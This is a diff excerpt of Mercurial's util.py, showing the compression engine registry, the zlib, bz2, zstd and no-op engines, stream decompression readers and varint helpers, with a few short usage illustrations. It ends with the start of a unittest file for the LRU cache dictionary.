3098 3120 dirs = self._dirs
3099 3121 for base in finddirs(path):
3100 3122 if base in dirs:
3101 3123 dirs[base] += 1
3102 3124 return
3103 3125 dirs[base] = 1
3104 3126
3105 3127 def delpath(self, path):
3106 3128 dirs = self._dirs
3107 3129 for base in finddirs(path):
3108 3130 if dirs[base] > 1:
3109 3131 dirs[base] -= 1
3110 3132 return
3111 3133 del dirs[base]
3112 3134
3113 3135 def __iter__(self):
3114 3136 return iter(self._dirs)
3115 3137
3116 3138 def __contains__(self, d):
3117 3139 return d in self._dirs
3118 3140
3119 3141 if safehasattr(parsers, 'dirs'):
3120 3142 dirs = parsers.dirs
3121 3143
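A sketch of the multiset semantics using the pure-Python class above (the C version from parsers behaves the same); native strings are used here for brevity:

    d = dirs(['a/b/c', 'a/d'])
    'a' in d            # True: referenced by both paths
    d.delpath('a/d')
    'a' in d            # still True via 'a/b/c'
    d.delpath('a/b/c')
    'a' in d            # False: last reference removed
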
3122 3144 def finddirs(path):
3123 3145 pos = path.rfind('/')
3124 3146 while pos != -1:
3125 3147 yield path[:pos]
3126 3148 pos = path.rfind('/', 0, pos)
3127 3149
3128 3150 # compression code
3129 3151
3130 3152 SERVERROLE = 'server'
3131 3153 CLIENTROLE = 'client'
3132 3154
3133 3155 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3134 3156 (u'name', u'serverpriority',
3135 3157 u'clientpriority'))
3136 3158
3137 3159 class compressormanager(object):
3138 3160 """Holds registrations of various compression engines.
3139 3161
3140 3162 This class essentially abstracts the differences between compression
3141 3163 engines to allow new compression formats to be added easily, possibly from
3142 3164 extensions.
3143 3165
3144 3166 Compressors are registered against the global instance by calling its
3145 3167 ``register()`` method.
3146 3168 """
3147 3169 def __init__(self):
3148 3170 self._engines = {}
3149 3171 # Bundle spec human name to engine name.
3150 3172 self._bundlenames = {}
3151 3173 # Internal bundle identifier to engine name.
3152 3174 self._bundletypes = {}
3153 3175 # Revlog header to engine name.
3154 3176 self._revlogheaders = {}
3155 3177 # Wire proto identifier to engine name.
3156 3178 self._wiretypes = {}
3157 3179
3158 3180 def __getitem__(self, key):
3159 3181 return self._engines[key]
3160 3182
3161 3183 def __contains__(self, key):
3162 3184 return key in self._engines
3163 3185
3164 3186 def __iter__(self):
3165 3187 return iter(self._engines.keys())
3166 3188
3167 3189 def register(self, engine):
3168 3190 """Register a compression engine with the manager.
3169 3191
3170 3192 The argument must be a ``compressionengine`` instance.
3171 3193 """
3172 3194 if not isinstance(engine, compressionengine):
3173 3195 raise ValueError(_('argument must be a compressionengine'))
3174 3196
3175 3197 name = engine.name()
3176 3198
3177 3199 if name in self._engines:
3178 3200 raise error.Abort(_('compression engine %s already registered') %
3179 3201 name)
3180 3202
3181 3203 bundleinfo = engine.bundletype()
3182 3204 if bundleinfo:
3183 3205 bundlename, bundletype = bundleinfo
3184 3206
3185 3207 if bundlename in self._bundlenames:
3186 3208 raise error.Abort(_('bundle name %s already registered') %
3187 3209 bundlename)
3188 3210 if bundletype in self._bundletypes:
3189 3211 raise error.Abort(_('bundle type %s already registered by %s') %
3190 3212 (bundletype, self._bundletypes[bundletype]))
3191 3213
3192 3214 # No external facing name declared.
3193 3215 if bundlename:
3194 3216 self._bundlenames[bundlename] = name
3195 3217
3196 3218 self._bundletypes[bundletype] = name
3197 3219
3198 3220 wiresupport = engine.wireprotosupport()
3199 3221 if wiresupport:
3200 3222 wiretype = wiresupport.name
3201 3223 if wiretype in self._wiretypes:
3202 3224 raise error.Abort(_('wire protocol compression %s already '
3203 3225 'registered by %s') %
3204 3226 (wiretype, self._wiretypes[wiretype]))
3205 3227
3206 3228 self._wiretypes[wiretype] = name
3207 3229
3208 3230 revlogheader = engine.revlogheader()
3209 3231 if revlogheader and revlogheader in self._revlogheaders:
3210 3232 raise error.Abort(_('revlog header %s already registered by %s') %
3211 3233 (revlogheader, self._revlogheaders[revlogheader]))
3212 3234
3213 3235 if revlogheader:
3214 3236 self._revlogheaders[revlogheader] = name
3215 3237
3216 3238 self._engines[name] = engine
3217 3239
3218 3240 @property
3219 3241 def supportedbundlenames(self):
3220 3242 return set(self._bundlenames.keys())
3221 3243
3222 3244 @property
3223 3245 def supportedbundletypes(self):
3224 3246 return set(self._bundletypes.keys())
3225 3247
3226 3248 def forbundlename(self, bundlename):
3227 3249 """Obtain a compression engine registered to a bundle name.
3228 3250
3229 3251 Will raise KeyError if the bundle name isn't registered.
3230 3252
3231 3253 Will abort if the engine is known but not available.
3232 3254 """
3233 3255 engine = self._engines[self._bundlenames[bundlename]]
3234 3256 if not engine.available():
3235 3257 raise error.Abort(_('compression engine %s could not be loaded') %
3236 3258 engine.name())
3237 3259 return engine
3238 3260
3239 3261 def forbundletype(self, bundletype):
3240 3262 """Obtain a compression engine registered to a bundle type.
3241 3263
3242 3264 Will raise KeyError if the bundle type isn't registered.
3243 3265
3244 3266 Will abort if the engine is known but not available.
3245 3267 """
3246 3268 engine = self._engines[self._bundletypes[bundletype]]
3247 3269 if not engine.available():
3248 3270 raise error.Abort(_('compression engine %s could not be loaded') %
3249 3271 engine.name())
3250 3272 return engine
3251 3273
3252 3274 def supportedwireengines(self, role, onlyavailable=True):
3253 3275 """Obtain compression engines that support the wire protocol.
3254 3276
3255 3277 Returns a list of engines in prioritized order, most desired first.
3256 3278
3257 3279 If ``onlyavailable`` is set, filter out engines that can't be
3258 3280 loaded.
3259 3281 """
3260 3282 assert role in (SERVERROLE, CLIENTROLE)
3261 3283
3262 3284 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3263 3285
3264 3286 engines = [self._engines[e] for e in self._wiretypes.values()]
3265 3287 if onlyavailable:
3266 3288 engines = [e for e in engines if e.available()]
3267 3289
3268 3290 def getkey(e):
3269 3291 # Sort first by priority, highest first. In case of tie, sort
3270 3292 # alphabetically. This is arbitrary, but ensures output is
3271 3293 # stable.
3272 3294 w = e.wireprotosupport()
3273 3295 return -1 * getattr(w, attr), w.name
3274 3296
3275 3297 return list(sorted(engines, key=getkey))
3276 3298
3277 3299 def forwiretype(self, wiretype):
3278 3300 engine = self._engines[self._wiretypes[wiretype]]
3279 3301 if not engine.available():
3280 3302 raise error.Abort(_('compression engine %s could not be loaded') %
3281 3303 engine.name())
3282 3304 return engine
3283 3305
3284 3306 def forrevlogheader(self, header):
3285 3307 """Obtain a compression engine registered to a revlog header.
3286 3308
3287 3309 Will raise KeyError if the revlog header value isn't registered.
3288 3310 """
3289 3311 return self._engines[self._revlogheaders[header]]
3290 3312
3291 3313 compengines = compressormanager()
3292 3314
3293 3315 class compressionengine(object):
3294 3316 """Base class for compression engines.
3295 3317
3296 3318 Compression engines must implement the interface defined by this class.
3297 3319 """
3298 3320 def name(self):
3299 3321 """Returns the name of the compression engine.
3300 3322
3301 3323 This is the key the engine is registered under.
3302 3324
3303 3325 This method must be implemented.
3304 3326 """
3305 3327 raise NotImplementedError()
3306 3328
3307 3329 def available(self):
3308 3330 """Whether the compression engine is available.
3309 3331
3310 3332 The intent of this method is to allow optional compression engines
3311 3333 that may not be available in all installations (such as engines relying
3312 3334 on C extensions that may not be present).
3313 3335 """
3314 3336 return True
3315 3337
3316 3338 def bundletype(self):
3317 3339 """Describes bundle identifiers for this engine.
3318 3340
3319 3341 If this compression engine isn't supported for bundles, returns None.
3320 3342
3321 3343 If this engine can be used for bundles, returns a 2-tuple of strings of
3322 3344 the user-facing "bundle spec" compression name and an internal
3323 3345 identifier used to denote the compression format within bundles. To
3324 3346 exclude the name from external usage, set the first element to ``None``.
3325 3347
3326 3348 If bundle compression is supported, the class must also implement
3327 3349 ``compressstream`` and ``decompressorreader``.
3328 3350
3329 3351 The docstring of this method is used in the help system to tell users
3330 3352 about this engine.
3331 3353 """
3332 3354 return None
3333 3355
3334 3356 def wireprotosupport(self):
3335 3357 """Declare support for this compression format on the wire protocol.
3336 3358
3337 3359 If this compression engine isn't supported for compressing wire
3338 3360 protocol payloads, returns None.
3339 3361
3340 3362 Otherwise, returns ``compenginewireprotosupport`` with the following
3341 3363 fields:
3342 3364
3343 3365 * String format identifier
3344 3366 * Integer priority for the server
3345 3367 * Integer priority for the client
3346 3368
3347 3369 The integer priorities are used to order the advertisement of format
3348 3370 support by server and client. The highest integer is advertised
3349 3371 first. Integers with non-positive values aren't advertised.
3350 3372
3351 3373 The priority values are somewhat arbitrary and only used for default
3352 3374 ordering. The relative order can be changed via config options.
3353 3375
3354 3376 If wire protocol compression is supported, the class must also implement
3355 3377 ``compressstream`` and ``decompressorreader``.
3356 3378 """
3357 3379 return None
3358 3380
3359 3381 def revlogheader(self):
3360 3382 """Header added to revlog chunks that identifies this engine.
3361 3383
3362 3384 If this engine can be used to compress revlogs, this method should
3363 3385 return the bytes used to identify chunks compressed with this engine.
3364 3386 Else, the method should return ``None`` to indicate it does not
3365 3387 participate in revlog compression.
3366 3388 """
3367 3389 return None
3368 3390
3369 3391 def compressstream(self, it, opts=None):
3370 3392 """Compress an iterator of chunks.
3371 3393
3372 3394 The method receives an iterator (ideally a generator) of chunks of
3373 3395 bytes to be compressed. It returns an iterator (ideally a generator)
3374 3396 of bytes of chunks representing the compressed output.
3375 3397
3376 3398 Optionally accepts an argument defining how to perform compression.
3377 3399 Each engine treats this argument differently.
3378 3400 """
3379 3401 raise NotImplementedError()
3380 3402
3381 3403 def decompressorreader(self, fh):
3382 3404 """Perform decompression on a file object.
3383 3405
3384 3406 Argument is an object with a ``read(size)`` method that returns
3385 3407 compressed data. Return value is an object with a ``read(size)`` that
3386 3408 returns uncompressed data.
3387 3409 """
3388 3410 raise NotImplementedError()
3389 3411
3390 3412 def revlogcompressor(self, opts=None):
3391 3413 """Obtain an object that can be used to compress revlog entries.
3392 3414
3393 3415 The object has a ``compress(data)`` method that compresses binary
3394 3416 data. This method returns compressed binary data or ``None`` if
3395 3417 the data could not be compressed (too small, not compressible, etc).
3396 3418 The returned data should have a header uniquely identifying this
3397 3419 compression format so decompression can be routed to this engine.
3398 3420 This header should be identified by the ``revlogheader()`` return
3399 3421 value.
3400 3422
3401 3423 The object has a ``decompress(data)`` method that decompresses
3402 3424 data. The method will only be called if ``data`` begins with
3403 3425 ``revlogheader()``. The method should return the raw, uncompressed
3404 3426 data or raise a ``RevlogError``.
3405 3427
3406 3428 The object is reusable but is not thread safe.
3407 3429 """
3408 3430 raise NotImplementedError()
3409 3431
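As a hedged illustration of the interface above (the engine, its name, and the 'ID' bundle identifier are all hypothetical, not part of Mercurial), a pass-through engine only needs the bundle hooks; the base class already returns None for the wire protocol and revlog hooks:

    class _identityengine(compressionengine):
        """Hypothetical pass-through engine for demonstration."""
        def name(self):
            return 'identity'

        def bundletype(self):
            """No transformation is applied to the data."""
            return 'identity', 'ID'

        def compressstream(self, it, opts=None):
            return it  # emit chunks unchanged

        def decompressorreader(self, fh):
            return fh  # reading back is equally a no-op

    # compengines.register(_identityengine())  # hypothetical registration
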
3410 3432 class _CompressedStreamReader(object):
3411 3433 def __init__(self, fh):
3412 3434 if safehasattr(fh, 'unbufferedread'):
3413 3435 self._reader = fh.unbufferedread
3414 3436 else:
3415 3437 self._reader = fh.read
3416 3438 self._pending = []
3417 3439 self._pos = 0
3418 3440 self._eof = False
3419 3441
3420 3442 def _decompress(self, chunk):
3421 3443 raise NotImplementedError()
3422 3444
3423 3445 def read(self, l):
3424 3446 buf = []
3425 3447 while True:
3426 3448 while self._pending:
3427 3449 if len(self._pending[0]) > l + self._pos:
3428 3450 newbuf = self._pending[0]
3429 3451 buf.append(newbuf[self._pos:self._pos + l])
3430 3452 self._pos += l
3431 3453 return ''.join(buf)
3432 3454
3433 3455 newbuf = self._pending.pop(0)
3434 3456 if self._pos:
3435 3457 buf.append(newbuf[self._pos:])
3436 3458 l -= len(newbuf) - self._pos
3437 3459 else:
3438 3460 buf.append(newbuf)
3439 3461 l -= len(newbuf)
3440 3462 self._pos = 0
3441 3463
3442 3464 if self._eof:
3443 3465 return ''.join(buf)
3444 3466 chunk = self._reader(65536)
3445 3467 self._decompress(chunk)
3446 3468 if not chunk and not self._pending and not self._eof:
3447 3469 # No progress and no new data, bail out
3448 3470 return ''.join(buf)
3449 3471
3450 3472 class _GzipCompressedStreamReader(_CompressedStreamReader):
3451 3473 def __init__(self, fh):
3452 3474 super(_GzipCompressedStreamReader, self).__init__(fh)
3453 3475 self._decompobj = zlib.decompressobj()
3454 3476 def _decompress(self, chunk):
3455 3477 newbuf = self._decompobj.decompress(chunk)
3456 3478 if newbuf:
3457 3479 self._pending.append(newbuf)
3458 3480 d = self._decompobj.copy()
3459 3481 try:
3460 3482 d.decompress('x')
3461 3483 d.flush()
3462 3484 if d.unused_data == 'x':
3463 3485 self._eof = True
3464 3486 except zlib.error:
3465 3487 pass
3466 3488
3467 3489 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3468 3490 def __init__(self, fh):
3469 3491 super(_BZ2CompressedStreamReader, self).__init__(fh)
3470 3492 self._decompobj = bz2.BZ2Decompressor()
3471 3493 def _decompress(self, chunk):
3472 3494 newbuf = self._decompobj.decompress(chunk)
3473 3495 if newbuf:
3474 3496 self._pending.append(newbuf)
3475 3497 try:
3476 3498 while True:
3477 3499 newbuf = self._decompobj.decompress('')
3478 3500 if newbuf:
3479 3501 self._pending.append(newbuf)
3480 3502 else:
3481 3503 break
3482 3504 except EOFError:
3483 3505 self._eof = True
3484 3506
3485 3507 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3486 3508 def __init__(self, fh):
3487 3509 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3488 3510 newbuf = self._decompobj.decompress('BZ')
3489 3511 if newbuf:
3490 3512 self._pending.append(newbuf)
3491 3513
3492 3514 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3493 3515 def __init__(self, fh, zstd):
3494 3516 super(_ZstdCompressedStreamReader, self).__init__(fh)
3495 3517 self._zstd = zstd
3496 3518 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3497 3519 def _decompress(self, chunk):
3498 3520 newbuf = self._decompobj.decompress(chunk)
3499 3521 if newbuf:
3500 3522 self._pending.append(newbuf)
3501 3523 try:
3502 3524 while True:
3503 3525 newbuf = self._decompobj.decompress('')
3504 3526 if newbuf:
3505 3527 self._pending.append(newbuf)
3506 3528 else:
3507 3529 break
3508 3530 except self._zstd.ZstdError:
3509 3531 self._eof = True
3510 3532
3511 3533 class _zlibengine(compressionengine):
3512 3534 def name(self):
3513 3535 return 'zlib'
3514 3536
3515 3537 def bundletype(self):
3516 3538 """zlib compression using the DEFLATE algorithm.
3517 3539
3518 3540 All Mercurial clients should support this format. The compression
3519 3541 algorithm strikes a reasonable balance between compression ratio
3520 3542 and speed.
3521 3543 """
3522 3544 return 'gzip', 'GZ'
3523 3545
3524 3546 def wireprotosupport(self):
3525 3547 return compewireprotosupport('zlib', 20, 20)
3526 3548
3527 3549 def revlogheader(self):
3528 3550 return 'x'
3529 3551
3530 3552 def compressstream(self, it, opts=None):
3531 3553 opts = opts or {}
3532 3554
3533 3555 z = zlib.compressobj(opts.get('level', -1))
3534 3556 for chunk in it:
3535 3557 data = z.compress(chunk)
3536 3558 # Not all calls to compress emit data. It is cheaper to inspect
3537 3559 # here than to feed empty chunks through the generator.
3538 3560 if data:
3539 3561 yield data
3540 3562
3541 3563 yield z.flush()
3542 3564
3543 3565 def decompressorreader(self, fh):
3544 3566 return _GzipCompressedStreamReader(fh)
3545 3567
3546 3568 class zlibrevlogcompressor(object):
3547 3569 def compress(self, data):
3548 3570 insize = len(data)
3549 3571 # Caller handles empty input case.
3550 3572 assert insize > 0
3551 3573
3552 3574 if insize < 44:
3553 3575 return None
3554 3576
3555 3577 elif insize <= 1000000:
3556 3578 compressed = zlib.compress(data)
3557 3579 if len(compressed) < insize:
3558 3580 return compressed
3559 3581 return None
3560 3582
3561 3583 # zlib makes an internal copy of the input buffer, doubling
3562 3584 # memory usage for large inputs. So do streaming compression
3563 3585 # on large inputs.
3564 3586 else:
3565 3587 z = zlib.compressobj()
3566 3588 parts = []
3567 3589 pos = 0
3568 3590 while pos < insize:
3569 3591 pos2 = pos + 2**20
3570 3592 parts.append(z.compress(data[pos:pos2]))
3571 3593 pos = pos2
3572 3594 parts.append(z.flush())
3573 3595
3574 3596 if sum(map(len, parts)) < insize:
3575 3597 return ''.join(parts)
3576 3598 return None
3577 3599
3578 3600 def decompress(self, data):
3579 3601 try:
3580 3602 return zlib.decompress(data)
3581 3603 except zlib.error as e:
3582 3604 raise error.RevlogError(_('revlog decompress error: %s') %
3583 3605 stringutil.forcebytestr(e))
3584 3606
3585 3607 def revlogcompressor(self, opts=None):
3586 3608 return self.zlibrevlogcompressor()
3587 3609
3588 3610 compengines.register(_zlibengine())
3589 3611
3590 3612 class _bz2engine(compressionengine):
3591 3613 def name(self):
3592 3614 return 'bz2'
3593 3615
3594 3616 def bundletype(self):
3595 3617 """An algorithm that produces smaller bundles than ``gzip``.
3596 3618
3597 3619 All Mercurial clients should support this format.
3598 3620
3599 3621 This engine will likely produce smaller bundles than ``gzip`` but
3600 3622 will be significantly slower, both during compression and
3601 3623 decompression.
3602 3624
3603 3625 If available, the ``zstd`` engine can yield similar or better
3604 3626 compression at much higher speeds.
3605 3627 """
3606 3628 return 'bzip2', 'BZ'
3607 3629
3608 3630 # We declare a protocol name but don't advertise by default because
3609 3631 # it is slow.
3610 3632 def wireprotosupport(self):
3611 3633 return compewireprotosupport('bzip2', 0, 0)
3612 3634
3613 3635 def compressstream(self, it, opts=None):
3614 3636 opts = opts or {}
3615 3637 z = bz2.BZ2Compressor(opts.get('level', 9))
3616 3638 for chunk in it:
3617 3639 data = z.compress(chunk)
3618 3640 if data:
3619 3641 yield data
3620 3642
3621 3643 yield z.flush()
3622 3644
3623 3645 def decompressorreader(self, fh):
3624 3646 return _BZ2CompressedStreamReader(fh)
3625 3647
3626 3648 compengines.register(_bz2engine())
3627 3649
3628 3650 class _truncatedbz2engine(compressionengine):
3629 3651 def name(self):
3630 3652 return 'bz2truncated'
3631 3653
3632 3654 def bundletype(self):
3633 3655 return None, '_truncatedBZ'
3634 3656
3635 3657 # We don't implement compressstream because it is hackily handled elsewhere.
3636 3658
3637 3659 def decompressorreader(self, fh):
3638 3660 return _TruncatedBZ2CompressedStreamReader(fh)
3639 3661
3640 3662 compengines.register(_truncatedbz2engine())
3641 3663
3642 3664 class _noopengine(compressionengine):
3643 3665 def name(self):
3644 3666 return 'none'
3645 3667
3646 3668 def bundletype(self):
3647 3669 """No compression is performed.
3648 3670
3649 3671 Use this compression engine to explicitly disable compression.
3650 3672 """
3651 3673 return 'none', 'UN'
3652 3674
3653 3675 # Clients always support uncompressed payloads. Servers don't because
3654 3676 # unless you are on a fast network, uncompressed payloads can easily
3655 3677 # saturate your network pipe.
3656 3678 def wireprotosupport(self):
3657 3679 return compewireprotosupport('none', 0, 10)
3658 3680
3659 3681 # We don't implement revlogheader because it is handled specially
3660 3682 # in the revlog class.
3661 3683
3662 3684 def compressstream(self, it, opts=None):
3663 3685 return it
3664 3686
3665 3687 def decompressorreader(self, fh):
3666 3688 return fh
3667 3689
3668 3690 class nooprevlogcompressor(object):
3669 3691 def compress(self, data):
3670 3692 return None
3671 3693
3672 3694 def revlogcompressor(self, opts=None):
3673 3695 return self.nooprevlogcompressor()
3674 3696
3675 3697 compengines.register(_noopengine())
3676 3698
3677 3699 class _zstdengine(compressionengine):
3678 3700 def name(self):
3679 3701 return 'zstd'
3680 3702
3681 3703 @propertycache
3682 3704 def _module(self):
3683 3705 # Not all installs have the zstd module available. So defer importing
3684 3706 # until first access.
3685 3707 try:
3686 3708 from . import zstd
3687 3709 # Force delayed import.
3688 3710 zstd.__version__
3689 3711 return zstd
3690 3712 except ImportError:
3691 3713 return None
3692 3714
3693 3715 def available(self):
3694 3716 return bool(self._module)
3695 3717
3696 3718 def bundletype(self):
3697 3719 """A modern compression algorithm that is fast and highly flexible.
3698 3720
3699 3721 Only supported by Mercurial 4.1 and newer clients.
3700 3722
3701 3723 With the default settings, zstd compression is both faster and yields
3702 3724 better compression than ``gzip``. It also frequently yields better
3703 3725 compression than ``bzip2`` while operating at much higher speeds.
3704 3726
3705 3727 If this engine is available and backwards compatibility is not a
3706 3728 concern, it is likely the best available engine.
3707 3729 """
3708 3730 return 'zstd', 'ZS'
3709 3731
3710 3732 def wireprotosupport(self):
3711 3733 return compewireprotosupport('zstd', 50, 50)
3712 3734
3713 3735 def revlogheader(self):
3714 3736 return '\x28'
3715 3737
3716 3738 def compressstream(self, it, opts=None):
3717 3739 opts = opts or {}
3718 3740 # zstd level 3 is almost always significantly faster than zlib
3719 3741 # while providing no worse compression. It strikes a good balance
3720 3742 # between speed and compression.
3721 3743 level = opts.get('level', 3)
3722 3744
3723 3745 zstd = self._module
3724 3746 z = zstd.ZstdCompressor(level=level).compressobj()
3725 3747 for chunk in it:
3726 3748 data = z.compress(chunk)
3727 3749 if data:
3728 3750 yield data
3729 3751
3730 3752 yield z.flush()
3731 3753
3732 3754 def decompressorreader(self, fh):
3733 3755 return _ZstdCompressedStreamReader(fh, self._module)
3734 3756
3735 3757 class zstdrevlogcompressor(object):
3736 3758 def __init__(self, zstd, level=3):
3737 3759 # TODO consider omitting frame magic to save 4 bytes.
3738 3760 # This writes content sizes into the frame header. That is
3739 3761 # extra storage. But it allows a correct size memory allocation
3740 3762 # to hold the result.
3741 3763 self._cctx = zstd.ZstdCompressor(level=level)
3742 3764 self._dctx = zstd.ZstdDecompressor()
3743 3765 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3744 3766 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3745 3767
3746 3768 def compress(self, data):
3747 3769 insize = len(data)
3748 3770 # Caller handles empty input case.
3749 3771 assert insize > 0
3750 3772
3751 3773 if insize < 50:
3752 3774 return None
3753 3775
3754 3776 elif insize <= 1000000:
3755 3777 compressed = self._cctx.compress(data)
3756 3778 if len(compressed) < insize:
3757 3779 return compressed
3758 3780 return None
3759 3781 else:
3760 3782 z = self._cctx.compressobj()
3761 3783 chunks = []
3762 3784 pos = 0
3763 3785 while pos < insize:
3764 3786 pos2 = pos + self._compinsize
3765 3787 chunk = z.compress(data[pos:pos2])
3766 3788 if chunk:
3767 3789 chunks.append(chunk)
3768 3790 pos = pos2
3769 3791 chunks.append(z.flush())
3770 3792
3771 3793 if sum(map(len, chunks)) < insize:
3772 3794 return ''.join(chunks)
3773 3795 return None
3774 3796
3775 3797 def decompress(self, data):
3776 3798 insize = len(data)
3777 3799
3778 3800 try:
3779 3801 # This was measured to be faster than other streaming
3780 3802 # decompressors.
3781 3803 dobj = self._dctx.decompressobj()
3782 3804 chunks = []
3783 3805 pos = 0
3784 3806 while pos < insize:
3785 3807 pos2 = pos + self._decompinsize
3786 3808 chunk = dobj.decompress(data[pos:pos2])
3787 3809 if chunk:
3788 3810 chunks.append(chunk)
3789 3811 pos = pos2
3790 3812 # Frame should be exhausted, so no finish() API.
3791 3813
3792 3814 return ''.join(chunks)
3793 3815 except Exception as e:
3794 3816 raise error.RevlogError(_('revlog decompress error: %s') %
3795 3817 stringutil.forcebytestr(e))
3796 3818
3797 3819 def revlogcompressor(self, opts=None):
3798 3820 opts = opts or {}
3799 3821 return self.zstdrevlogcompressor(self._module,
3800 3822 level=opts.get('level', 3))
3801 3823
3802 3824 compengines.register(_zstdengine())
3803 3825
3804 3826 def bundlecompressiontopics():
3805 3827 """Obtains a list of available bundle compressions for use in help."""
3806 3828 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3807 3829 items = {}
3808 3830
3809 3831 # We need to format the docstring. So use a dummy object/type to hold it
3810 3832 # rather than mutating the original.
3811 3833 class docobject(object):
3812 3834 pass
3813 3835
3814 3836 for name in compengines:
3815 3837 engine = compengines[name]
3816 3838
3817 3839 if not engine.available():
3818 3840 continue
3819 3841
3820 3842 bt = engine.bundletype()
3821 3843 if not bt or not bt[0]:
3822 3844 continue
3823 3845
3824 3846 doc = pycompat.sysstr('``%s``\n %s') % (
3825 3847 bt[0], engine.bundletype.__doc__)
3826 3848
3827 3849 value = docobject()
3828 3850 value.__doc__ = doc
3829 3851 value._origdoc = engine.bundletype.__doc__
3830 3852 value._origfunc = engine.bundletype
3831 3853
3832 3854 items[bt[0]] = value
3833 3855
3834 3856 return items
3835 3857
3836 3858 i18nfunctions = bundlecompressiontopics().values()
3837 3859
3838 3860 # convenient shortcut
3839 3861 dst = debugstacktrace
3840 3862
3841 3863 def safename(f, tag, ctx, others=None):
3842 3864 """
3843 3865 Generate a name that is safe to rename f to in the given context.
3844 3866
3845 3867 f: filename to rename
3846 3868 tag: a string tag that will be included in the new name
3847 3869 ctx: a context, in which the new name must not exist
3848 3870 others: a set of other filenames that the new name must not be in
3849 3871
3850 3872 Returns a file name of the form oldname~tag[~number] which does not exist
3851 3873 in the provided context and is not in the set of other names.
3852 3874 """
3853 3875 if others is None:
3854 3876 others = set()
3855 3877
3856 3878 fn = '%s~%s' % (f, tag)
3857 3879 if fn not in ctx and fn not in others:
3858 3880 return fn
3859 3881 for n in itertools.count(1):
3860 3882 fn = '%s~%s~%s' % (f, tag, n)
3861 3883 if fn not in ctx and fn not in others:
3862 3884 return fn
3863 3885
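For illustration, with a context modeled as a plain set of existing names (values hypothetical):

    ctx = {'foo', 'foo~merge'}     # names that already exist
    safename('foo', 'merge', ctx)  # -> 'foo~merge~1' (plain tag is taken)
    safename('bar', 'merge', ctx)  # -> 'bar~merge'
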
3864 3886 def readexactly(stream, n):
3865 3887 '''read n bytes from stream.read and abort if less was available'''
3866 3888 s = stream.read(n)
3867 3889 if len(s) < n:
3868 3890 raise error.Abort(_("stream ended unexpectedly"
3869 3891 " (got %d bytes, expected %d)")
3870 3892 % (len(s), n))
3871 3893 return s
3872 3894
3873 3895 def uvarintencode(value):
3874 3896 """Encode an unsigned integer value to a varint.
3875 3897
3876 3898 A varint is a variable length integer of 1 or more bytes. Each byte
3877 3899 except the last has the most significant bit set. The lower 7 bits of
3878 3900 each byte store the integer's binary representation, least significant group
3879 3901 first.
3880 3902
3881 3903 >>> uvarintencode(0)
3882 3904 '\\x00'
3883 3905 >>> uvarintencode(1)
3884 3906 '\\x01'
3885 3907 >>> uvarintencode(127)
3886 3908 '\\x7f'
3887 3909 >>> uvarintencode(1337)
3888 3910 '\\xb9\\n'
3889 3911 >>> uvarintencode(65536)
3890 3912 '\\x80\\x80\\x04'
3891 3913 >>> uvarintencode(-1)
3892 3914 Traceback (most recent call last):
3893 3915 ...
3894 3916 ProgrammingError: negative value for uvarint: -1
3895 3917 """
3896 3918 if value < 0:
3897 3919 raise error.ProgrammingError('negative value for uvarint: %d'
3898 3920 % value)
3899 3921 bits = value & 0x7f
3900 3922 value >>= 7
3901 3923 bytes = []
3902 3924 while value:
3903 3925 bytes.append(pycompat.bytechr(0x80 | bits))
3904 3926 bits = value & 0x7f
3905 3927 value >>= 7
3906 3928 bytes.append(pycompat.bytechr(bits))
3907 3929
3908 3930 return ''.join(bytes)
3909 3931
3910 3932 def uvarintdecodestream(fh):
3911 3933 """Decode an unsigned variable length integer from a stream.
3912 3934
3913 3935 The passed argument is anything that has a ``.read(N)`` method.
3914 3936
3915 3937 >>> try:
3916 3938 ... from StringIO import StringIO as BytesIO
3917 3939 ... except ImportError:
3918 3940 ... from io import BytesIO
3919 3941 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3920 3942 0
3921 3943 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3922 3944 1
3923 3945 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3924 3946 127
3925 3947 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3926 3948 1337
3927 3949 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3928 3950 65536
3929 3951 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3930 3952 Traceback (most recent call last):
3931 3953 ...
3932 3954 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3933 3955 """
3934 3956 result = 0
3935 3957 shift = 0
3936 3958 while True:
3937 3959 byte = ord(readexactly(fh, 1))
3938 3960 result |= ((byte & 0x7f) << shift)
3939 3961 if not (byte & 0x80):
3940 3962 return result
3941 3963 shift += 7
@@ -1,221 +1,325 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 self.assertEqual(d.totalcost, 44)
26 26
27 27 # 'a' should be dropped because it was least recently used.
28 28 d['e'] = 've'
29 29 self.assertNotIn('a', d)
30 30 self.assertIsNone(d.get('a'))
31 31 self.assertEqual(d.totalcost, 42)
32 32
33 33 self.assertEqual(d['b'], 'vb')
34 34 self.assertEqual(d['c'], 'vc')
35 35 self.assertEqual(d['d'], 'vd')
36 36 self.assertEqual(d['e'], 've')
37 37
38 38 # Replacing item with different cost adjusts totalcost.
39 39 d.insert('e', 've', cost=4)
40 40 self.assertEqual(d.totalcost, 46)
41 41
42 42 # Touch entries in some order (both get and set).
43 43 d['e']
44 44 d['c'] = 'vc2'
45 45 d['d']
46 46 d['b'] = 'vb2'
47 47
48 48 # 'e' should be dropped now
